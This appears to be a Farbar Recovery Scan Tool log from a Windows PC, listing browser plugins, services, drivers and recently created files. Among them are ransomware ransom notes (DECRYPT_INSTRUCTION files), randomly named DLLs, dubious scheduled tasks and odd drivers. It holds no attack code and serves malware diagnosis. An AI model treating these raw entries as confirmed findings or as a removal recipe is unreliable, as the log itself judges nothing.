BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll (Logitech, Inc.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM-x32 - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll (Microsoft Corporation.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Hosts: Hosts file not detected in the default directory
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
 
FireFox:
========
FF ProfilePath: C:\Users\RaRWolf\AppData\Roaming\Mozilla\Firefox\Profiles\g0sikcyb.default-1384639035960
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin: @esn/npbattlelog,version=2.5.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.1\npbattlelogx64.dll (EA Digital Illusions CE AB)
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @esn.me/esnsonar,version=0.70.4 -> C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\npesnsonar.dll No File
FF Plugin-x32: @esn/npbattlelog,version=2.3.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.3.1\npbattlelog.dll No File
FF Plugin-x32: @esn/npbattlelog,version=2.4.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll (EA Digital Illusions CE AB)
FF Plugin-x32: @esn/npbattlelog,version=2.5.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.1\npbattlelog.dll (EA Digital Illusions CE AB)
FF Plugin-x32: @idsoftware.com/QuakeLive -> C:\ProgramData\id Software\QuakeLive\npquakezero.dll (id Software Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> C:\Program Files (x86)\Heroes & Generals\live\npretoxlive.dll No File
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3503.0728 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @real.com/nppl3260;version=17.0.12.0 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.12 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.12.0 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer Cloud)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @TrendMicro.com/FFExtension -> C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\firefoxextension\components\npToolbarChrome.dll No File
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin HKCU: @coreonline.com/run3d,version=1.0 -> C:\Users\RaRWolf\AppData\LocalLow\Square Enix\nprun3d.dll (Square Enix)
FF Plugin HKCU: @nsroblox.roblox.com/launcher -> C:\Users\RaRWolf\AppData\Local\Roblox\Versions\version-58bb25d673384171\\NPRobloxProxy.dll ( Roblox Corporation)
FF Plugin HKCU: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\RaRWolf\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF Plugin HKCU: ubisoft.com/uplaypc -> C:\Games\Trials\datapack\orbit\npuplaypc.dll No File
FF Extension: YouTube Center - C:\Users\RaRWolf\AppData\Roaming\Mozilla\Firefox\Profiles\g0sikcyb.default-1384639035960\Extensions\jid1-cwbvBTE216jjpg@jetpack.xpi [2013-12-23]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-07-14]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: Logitech SetPoint - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2014-07-15]
FF HKLM-x32\...\Firefox\Extensions: [{7C9C2591-51ED-44FA-8D03-450B92643F95}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-08-01]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
CHR Profile: C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-03-20]
CHR Extension: (Google Drive) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-03-20]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-24]
CHR Extension: (YouTube) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-03-20]
CHR Extension: (Google Search) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-03-20]
CHR Extension: (YouTube Center) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\nahndmkihaedfgkhbpopcpnbdeckeibo [2014-03-20]
CHR Extension: (Google Wallet) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-03-20]
CHR Extension: (Gmail) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-03-20]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe [920736 2012-06-01] ()
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe [951936 2012-06-01] (ASUSTeK Computer Inc.)
R2 AsSysCtrlService; C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe [149120 2012-02-17] (ASUSTeK Computer Inc.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2013-02-03] () [File not signed]
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
R2 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9216 2014-02-28] (Hi-Rez Studios) [File not signed]
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R3 KeyIso; C:\Windows\SysWOW64\keyiso.dll [43520 2012-07-25] (Microsoft Corporation)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [377616 2014-08-08] (LogMeIn, Inc.)
S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)
S3 Netlogon; C:\Windows\SysWOW64\netlogon.dll [634368 2012-07-25] (Microsoft Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18956064 2014-07-25] (NVIDIA Corporation)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76152 2014-06-30] ()
S2 PSI_SVC_2_x64; c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe [336824 2010-11-30] (arvato digital services llc)
S2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-07-24] ()
S2 RealPlayer Cloud Service; C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpdsvc.exe [1141848 2014-08-01] (RealNetworks, Inc.)
S2 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [23552 2014-07-24] () [File not signed]
S2 RzKLService; C:\Program Files (x86)\Razer\Razer Game Booster\RzKLService.exe [106472 2013-09-18] (Razer Inc.)
S2 RzMaelstromVADStreamingService; C:\ProgramData\Razer\Synapse\Devices\Razer Surround\Driver\RzMaelstromVADStreamingService.exe [4250624 2014-06-09] (A-Volute) [File not signed]
S3 StorSvc; C:\Windows\SysWOW64\storsvc.dll [18432 2012-07-25] (Microsoft Corporation)
R2 TabletServiceWacom; C:\Windows\system32\Wacom_Tablet.exe [3647272 2009-03-26] (Wacom Technology, Corp.)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [14920 2013-01-28] (Microsoft Corporation)
R2 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [635160 2014-04-21] (Wacom Technology, Corp.)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AiCharger; C:\Windows\SysWow64\drivers\AiCharger.sys [14848 2012-03-22] (ASUSTek Computer Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2010-08-24] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [14464 2010-08-03] ()
S3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdW86.sys [98744 2013-04-23] (Advanced Micro Devices)
S2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [312480 2014-04-24] ()
R3 dtsoftbus01; C:\Windows\System32\drivers\dtsoftbus01.sys [283200 2013-05-26] (DT Soft Ltd)
S1 fsthvckq; C:\Windows\system32\drivers\fsthvckq.sys [55104 2014-10-19] (Microsoft Corporation)
R3 hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [46136 2014-09-04] (LogMeIn Inc.)
R3 LcUvcUpper; C:\Windows\system32\DRIVERS\LcUvcUpper.sys [34408 2013-10-14] (Microsoft Corporation)
R3 Linksys_adapter_H; C:\Windows\system32\DRIVERS\AE2500w764.sys [1254464 2011-03-28] (Broadcom Corporation)
R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [43168 2014-04-24] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2014-05-12] (Malwarebytes Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20256 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
S3 RTCore64; C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [13368 2013-01-23] ()
R3 RZMAELSTROMVADService; C:\Windows\system32\drivers\RzMaelstromVAD.sys [32768 2014-06-09] (Windows ® Win 7 DDK provider)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [37184 2014-07-15] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [129856 2014-07-03] (Razer, Inc.)
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()
S3 xusb22; C:\Windows\System32\drivers\xusb22.sys [89088 2012-07-25] (Microsoft Corporation)
S2 AODDriver4.2.0; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [X]
S1 ririguvw; \??\C:\Windows\system32\drivers\ririguvw.sys [X]
S3 wacommousefilter; \SystemRoot\System32\drivers\wacommousefilter.sys [X]
S3 wacomvhid; \SystemRoot\System32\drivers\wacomvhid.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-22 17:11 - 2014-10-22 17:13 - 00038783 _____ () C:\Users\RaRWolf\Downloads\FRST.txt
2014-10-22 17:11 - 2014-10-22 17:11 - 00000000 ____D () C:\Users\RaRWolf\Downloads\FRST-OlderVersion
2014-10-21 18:40 - 2014-10-21 18:40 - 00032720 _____ () C:\Users\RaRWolf\Desktop\attach.txt
2014-10-21 18:40 - 2014-10-21 18:39 - 00021892 _____ () C:\Users\RaRWolf\Desktop\dds.txt
2014-10-21 18:35 - 2014-10-21 18:35 - 00688992 ____R (Swearware) C:\Users\RaRWolf\Downloads\dds.com
2014-10-21 18:29 - 2014-10-21 18:29 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Running With Rifles 0.98.4
2014-10-19 21:20 - 2014-10-19 21:20 - 00055104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fsthvckq.sys
2014-10-19 21:17 - 2014-10-19 21:21 - 00005062 _____ () C:\Windows\SysWOW64\rsslogs.20141019211656
2014-10-19 21:11 - 2014-10-19 21:14 - 00003797 _____ () C:\Windows\SysWOW64\rsslogs.20141019211029
2014-10-19 11:45 - 2014-10-19 11:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\PAYDAY
2014-10-19 11:40 - 2014-10-19 11:41 - 00002535 _____ () C:\Windows\SysWOW64\rsslogs.20141019113949
2014-10-18 23:58 - 2014-10-19 10:42 - 00029055 _____ () C:\Windows\SysWOW64\rsslogs.20141018235802
2014-10-18 19:10 - 2014-10-19 11:39 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Ifylqyte
2014-10-18 19:07 - 2014-10-18 20:42 - 00003246 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1557230296-4363482-4078292831-1002
2014-10-18 19:06 - 2014-10-18 20:42 - 00003376 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1557230296-4363482-4078292831-1002
2014-10-18 19:03 - 2014-10-22 17:00 - 00000844 _____ () C:\Windows\Tasks\Security Center Update - 3324824421.job
2014-10-18 19:03 - 2014-10-18 19:03 - 00003820 _____ () C:\Windows\System32\Tasks\Security Center Update - 3324824421
2014-10-18 19:00 - 2014-10-18 23:58 - 00376141 _____ () C:\Windows\SysWOW64\rsslogs.20141018185920
2014-10-18 18:49 - 2014-10-18 18:49 - 00003160 _____ () C:\Windows\System32\Tasks\{1E3340DC-06B1-483A-AA5F-84CF6DD5E40A}
2014-10-18 18:47 - 2014-10-18 18:47 - 00192999 _____ () C:\Users\RaRWolf\Downloads\inform633_win32.zip
2014-10-18 18:36 - 2014-10-18 18:36 - 00253546 _____ () C:\Users\RaRWolf\Downloads\inform6.zip
2014-10-18 18:04 - 2014-10-18 18:05 - 08119386 _____ () C:\Users\RaRWolf\Downloads\I7_6L38_Windows.exe
2014-10-18 10:50 - 2014-10-22 17:00 - 00000844 _____ () C:\Windows\Tasks\Security Center Update - 3847798286.job
2014-10-18 10:50 - 2014-10-18 10:50 - 00003820 _____ () C:\Windows\System32\Tasks\Security Center Update - 3847798286
2014-10-17 19:54 - 2014-10-17 19:58 - 00005058 _____ () C:\Windows\SysWOW64\rsslogs.20141017195335
2014-10-17 17:32 - 2014-10-17 17:36 - 00006318 _____ () C:\Windows\SysWOW64\rsslogs.20141017173148
2014-10-17 17:27 - 2014-10-17 17:27 - 00000000 __SHD () C:\found.000
2014-10-17 07:36 - 2014-10-22 17:00 - 00000848 _____ () C:\Windows\Tasks\Security Center Update - 2903558157.job
2014-10-17 07:36 - 2014-10-17 07:36 - 00003824 _____ () C:\Windows\System32\Tasks\Security Center Update - 2903558157
2014-10-16 18:00 - 2014-10-16 18:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\by Decepticon
2014-10-16 15:41 - 2014-10-16 20:17 - 00349655 _____ () C:\Windows\SysWOW64\rsslogs.20141016154014
2014-10-16 15:35 - 2014-10-22 17:00 - 00000844 _____ () C:\Windows\Tasks\Security Center Update - 3029572363.job
2014-10-16 15:35 - 2014-10-16 15:35 - 00003820 _____ () C:\Windows\System32\Tasks\Security Center Update - 3029572363
2014-10-16 15:34 - 2014-10-22 17:00 - 00000932 _____ () C:\Windows\Tasks\Security Center Update - 258622643.job
2014-10-16 15:34 - 2014-10-16 15:34 - 00003908 _____ () C:\Windows\System32\Tasks\Security Center Update - 258622643
2014-10-16 15:25 - 2014-10-22 17:00 - 00000934 _____ () C:\Windows\Tasks\Security Center Update - 1765064875.job
2014-10-16 15:25 - 2014-10-21 18:36 - 00000272 _____ () C:\Users\RaRWolf\INSTALL_TOR.URL
2014-10-16 15:25 - 2014-10-16 15:25 - 00003910 _____ () C:\Windows\System32\Tasks\Security Center Update - 1765064875
2014-10-16 15:03 - 2014-10-16 15:03 - 00045442 _____ () C:\Windows\SysWOW64\rsslogs.20141016150239
2014-10-16 12:04 - 2014-10-16 12:04 - 00223097 _____ () C:\Windows\SysWOW64\rsslogs.20141016120406
2014-10-16 07:06 - 2014-10-16 12:04 - 00375584 _____ () C:\Windows\SysWOW64\rsslogs.20141016070501
2014-10-16 01:10 - 2014-10-16 01:10 - 00452714 _____ () C:\Windows\SysWOW64\rsslogs.20141016011028
2014-10-15 11:43 - 2014-10-16 01:09 - 01117862 _____ () C:\Windows\SysWOW64\rsslogs.20141015114230
2014-10-15 01:10 - 2014-10-15 11:42 - 00821065 _____ () C:\Windows\SysWOW64\rsslogs.20141015011027
2014-10-14 20:12 - 2014-10-15 01:10 - 00376136 _____ () C:\Windows\SysWOW64\rsslogs.20141014201145
2014-10-13 21:01 - 2014-10-13 21:02 - 07600226 _____ () C:\Users\RaRWolf\Downloads\ACBF_THEME.ZIP
2014-10-13 18:14 - 2014-10-13 18:14 - 00000000 ____D () C:\Windows\LastGood.Tmp
2014-10-12 22:17 - 2014-10-12 22:17 - 00002776 _____ () C:\Windows\System32\Tasks\CCleanerSkipUAC
2014-10-12 22:16 - 2014-10-12 22:17 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-12 22:16 - 2014-10-12 22:16 - 04965896 _____ (Piriform Ltd) C:\Users\RaRWolf\Downloads\ccsetup418 (1).exe
2014-10-12 22:16 - 2014-10-12 22:16 - 00000829 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-10-12 22:16 - 2014-10-12 22:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-10-12 05:55 - 2014-10-12 05:57 - 00000000 ____D () C:\reg value hkus
2014-10-12 00:25 - 2014-10-12 00:25 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Plarium
2014-10-12 00:24 - 2014-10-12 00:22 - 04378864 _____ (Piriform Ltd) C:\Users\RaRWolf\Downloads\cc_setup.exe
2014-10-11 23:31 - 2014-10-11 23:33 - 00800688 _____ ( ) C:\Users\RaRWolf\Downloads\CCleaner_Setup.exe
2014-10-11 23:31 - 2014-10-11 23:33 - 00800688 _____ ( ) C:\Users\RaRWolf\Downloads\CCleaner_Setup (1).exe
2014-10-11 11:46 - 2014-10-11 11:46 - 01121208 _____ () C:\Users\RaRWolf\Downloads\ProcessMonitor.zip
2014-10-10 14:05 - 2014-10-10 14:24 - 00000000 ____D () C:\Users\RaRWolf\Zomboid
2014-10-10 12:55 - 2014-10-10 12:55 - 00081408 _____ () C:\Users\RaRWolf\AppData\Roaming\qxigf.dll
2014-10-10 12:55 - 2014-10-10 12:55 - 00047104 _____ () C:\Users\RaRWolf\AppData\Roaming\dbrmh.dll
2014-10-10 12:55 - 2014-10-10 12:55 - 00004060 _____ () C:\Windows\System32\Tasks\{AE7C3D4A-D84F-FFE7-69BB-457B9C83DCAC}
2014-10-10 12:55 - 2014-10-10 12:55 - 00000000 _____ () C:\Users\RaRWolf\AppData\Roaming\nzhmwb.dll
2014-10-10 08:07 - 2014-10-10 08:07 - 00000000 ____D () C:\ProgramData\E1802384DB2718039F19F24F4594560F
2014-10-10 07:58 - 2014-10-10 07:58 - 00000000 ____D () C:\Users\RaRWolf\Documents\GameMaker
2014-10-10 07:57 - 2014-10-10 08:07 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\gamemaker_studio
2014-10-10 07:57 - 2014-10-10 07:57 - 00000000 ____D () C:\ProgramData\gamemaker_studio
2014-10-09 16:51 - 2014-10-22 17:12 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Skype
2014-10-08 21:59 - 2014-10-18 20:41 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\AIMP3
2014-10-08 21:03 - 2014-10-08 21:04 - 07718830 _____ () C:\Users\RaRWolf\Downloads\aimp_3.50.1224_beta_1.zip
2014-10-08 18:45 - 2014-10-08 18:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Stykz Help
2014-10-08 18:41 - 2014-10-08 18:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stykz
2014-10-08 18:40 - 2014-10-08 18:41 - 09890335 _____ () C:\Users\RaRWolf\Downloads\Install_Stykz (1).zip
2014-10-07 19:44 - 2014-10-07 19:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2014-10-07 19:43 - 2014-10-07 19:43 - 01677920 _____ (Skype Technologies S.A.) C:\Users\RaRWolf\Downloads\SkypeSetup.exe
2014-10-07 18:53 - 2014-10-14 20:08 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-07 18:52 - 2014-10-07 18:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-07 18:52 - 2014-10-07 18:52 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-07 18:52 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-07 18:52 - 2014-05-12 07:26 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-07 18:52 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-07 18:44 - 2014-10-07 18:45 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\RaRWolf\Downloads\mbam-setup-2.0.2.1012.exe
2014-10-07 02:32 - 2014-10-21 18:36 - 00008516 _____ () C:\Users\RaRWolf\DECRYPT_INSTRUCTION.HTML
2014-10-07 02:32 - 2014-10-21 18:36 - 00004198 _____ () C:\Users\RaRWolf\DECRYPT_INSTRUCTION.TXT
2014-10-07 02:32 - 2014-10-07 02:32 - 00000276 _____ () C:\Users\RaRWolf\DECRYPT_INSTRUCTION.URL
2014-10-06 22:50 - 2014-10-06 22:50 - 01887384 _____ ( ) C:\Users\RaRWolf\Downloads\Pivot_v4-1.exe
2014-10-06 22:38 - 2014-10-06 22:38 - 00027448 _____ () C:\Users\RaRWolf\Downloads\12197798227.zip
2014-10-06 22:29 - 2014-10-06 22:30 - 07085849 _____ () C:\Users\RaRWolf\Downloads\1208036521.zip
2014-10-06 22:29 - 2014-10-06 22:30 - 02304925 _____ () C:\Users\RaRWolf\Downloads\1208088047.zip
2014-10-06 22:17 - 2014-10-06 22:17 - 00008224 _____ () C:\Users\RaRWolf\Documents\DECRYPT_INSTRUCTION.HTML
2014-10-06 22:17 - 2014-10-06 22:17 - 00004156 _____ () C:\Users\RaRWolf\Documents\DECRYPT_INSTRUCTION.TXT
2014-10-06 22:17 - 2014-10-06 22:17 - 00000276 _____ () C:\Users\RaRWolf\Documents\DECRYPT_INSTRUCTION.URL
2014-10-06 22:16 - 2014-10-08 18:48 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\._LiveCode_
2014-10-06 22:15 - 2014-10-08 18:47 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Stykz
2014-10-06 22:15 - 2014-10-06 22:15 - 00000000 ____D () C:\Users\RaRWolf\Documents\Animations
2014-10-06 22:12 - 2014-10-06 22:14 - 09890335 _____ () C:\Users\RaRWolf\Downloads\Install_Stykz.zip
2014-10-06 21:48 - 2014-10-06 21:48 - 00008224 _____ () C:\Users\RaRWolf\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-10-06 21:48 - 2014-10-06 21:48 - 00008224 _____ () C:\Users\RaRWolf\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-06 21:48 - 2014-10-06 21:48 - 00004156 _____ () C:\Users\RaRWolf\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-10-06 21:48 - 2014-10-06 21:48 - 00004156 _____ () C:\Users\RaRWolf\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-06 21:48 - 2014-10-06 21:48 - 00000276 _____ () C:\Users\RaRWolf\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2014-10-06 21:48 - 2014-10-06 21:48 - 00000276 _____ () C:\Users\RaRWolf\AppData\DECRYPT_INSTRUCTION.URL
2014-10-06 20:34 - 2014-10-06 20:34 - 00008224 _____ () C:\Users\RaRWolf\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-06 20:34 - 2014-10-06 20:34 - 00004156 _____ () C:\Users\RaRWolf\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-06 20:34 - 2014-10-06 20:34 - 00000276 _____ () C:\Users\RaRWolf\AppData\Local\DECRYPT_INSTRUCTION.URL
